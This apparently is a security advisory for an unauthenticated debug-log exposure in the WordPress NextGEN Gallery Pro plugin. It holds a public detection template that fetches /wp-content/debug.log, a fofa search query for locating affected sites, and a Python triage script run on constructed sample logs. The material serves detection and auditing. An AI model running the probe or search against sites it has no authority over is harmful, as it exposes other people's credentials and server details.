nextgen-gallery-pro-error-log: WordPress NextGEN Gallery Pro - Error Log Disclosure

Date: 2026-01-08 | Affected software: WordPress NextGEN Gallery Pro | PoC: public

Vulnerability description

The NextGEN Gallery Pro plugin for WordPress may expose debug/error log files that contain sensitive information including file paths, database queries, and potentially credentials. These log files are accessible without authentication.

PoC code [public]

id: nextgen-gallery-pro-error-log

info:
  name: WordPress NextGEN Gallery Pro - Error Log Disclosure
  author: ritikchaddha
  severity: medium
  description: |
    The NextGEN Gallery Pro plugin for WordPress may expose debug/error log files that contain sensitive information including file paths, database queries, and potentially credentials. These log files are accessible without authentication.
  reference:
    - https://wpscan.com/plugin/nextgen-gallery/
    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-nextgen-gallery-wordpress-gallery-information-disclosure-1-9-11/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-532
  metadata:
    verified: true
    fofa-query: body="/plugins/nextgen-gallery-pro"
  tags: wordpress,wp,wp-plugin,nextgen-gallery-pro,log,exposure

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "nextgen"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/debug.log"

    matchers:
      - type: dsl
        dsl:
          - 'regex("[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP", body)'
          - 'contains_any(body, "PHP Warning:", "PHP Notice:", "Undefined array", "Undefined variable")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100a7313133e65a3fa6d843ba22f76663d160e50ec7cbe071f7f1b779b004e364ca022100d07cfc10a4ba662e75fc44d155dc139c77d0b68e4a09b0811bc821ebb3650967:922c64590222798bb761d5b6d8e72950
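
For auditing a site you operate, the second request's three matcher conditions can be applied offline to a saved response, followed by a per-category count of what the log leaks. This is an added example, not part of the template or the plugin; the leak patterns and both sample responses are constructed assumptions, and the timestamp regex is written with its brackets escaped so they match literally.

```python
import re

# Timestamp prefix PHP writes to debug.log, e.g. "[08-Jan-2026 10:15:02 UTC] PHP".
# The square brackets are escaped so they are matched as literal characters.
STAMP = re.compile(r"\[\d{2}-[A-Za-z]{3}-\d{4} \d{2}:\d{2}:\d{2} [A-Z]{3}\] PHP")
MARKERS = ("PHP Warning:", "PHP Notice:", "Undefined array", "Undefined variable")

# Leak categories named in the description; the patterns are assumptions for triage.
LEAKS = {
    "file_path": re.compile(r" in (/[^\s:]+\.php)"),
    "db_query": re.compile(r"WordPress database error|\bSELECT\b.*\bFROM\b"),
    "credential": re.compile(r"(?i)(?:password|passwd|secret|api[_-]?key)\s*[=:]"),
}

def is_exposed_debug_log(status_code, body):
    """Same three conditions as the template's second request, ANDed together."""
    return (status_code == 200
            and STAMP.search(body) is not None
            and any(marker in body for marker in MARKERS))

def triage(body):
    """Count log lines that fall into each leak category."""
    counts = {name: 0 for name in LEAKS}
    for line in body.splitlines():
        for name, pattern in LEAKS.items():
            if pattern.search(line):
                counts[name] += 1
    return counts

# Constructed sample responses (not captured from a real site).
SAMPLE_LOG = "\n".join([
    "[08-Jan-2026 10:15:02 UTC] PHP Warning:  Undefined variable $gallery "
    "in /var/www/html/wp-content/plugins/example/view.php on line 42",
    "[08-Jan-2026 10:15:03 UTC] WordPress database error Table 'wp.wp_example' "
    "doesn't exist for query SELECT * FROM wp_example",
    "[08-Jan-2026 10:15:04 UTC] PHP Notice:  smtp password= EXAMPLE-ONLY "
    "in /var/www/html/wp-content/plugins/example/mail.php on line 7",
])
# A themed "not found" page served with status 200 must not count as a finding.
SOFT_404 = "<html><body><h1>Page not found</h1><p>PHP Warning: docs</p></body></html>"

if __name__ == "__main__":
    print(is_exposed_debug_log(200, SAMPLE_LOG), triage(SAMPLE_LOG))
    print(is_exposed_debug_log(200, SOFT_404))
```

A non-zero `credential` or `db_query` count means the exposure should be handled as a secrets leak (rotate what was logged), not only as a file to block.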
